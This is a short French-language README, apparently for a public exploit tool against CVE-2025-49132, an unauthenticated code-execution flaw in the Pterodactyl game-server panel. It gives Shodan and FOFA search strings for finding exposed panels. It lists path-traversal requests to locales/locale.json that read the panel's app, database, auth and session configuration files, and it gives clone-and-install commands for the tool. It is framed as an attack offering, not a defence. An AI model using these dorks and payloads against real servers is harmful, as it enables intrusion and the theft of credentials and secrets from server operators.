
Outil d'exploitation pour CVE-2025-49132 — une vulnérabilité critique d'exécution de code arbitraire sans authentification affectant le panneau de serveur de jeux Pterodactyl.
Une faille ACE critique dans le panneau Pterodactyl qui permet à des attaquants distants non authentifiés d'exécuter du code arbitraire — pouvant mener à une compromission complète du système.
Aucune authentification requise. Juste une instance vulnérable.
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| Logiciel | Statut |
|---|---|
| Pterodactyl Panel |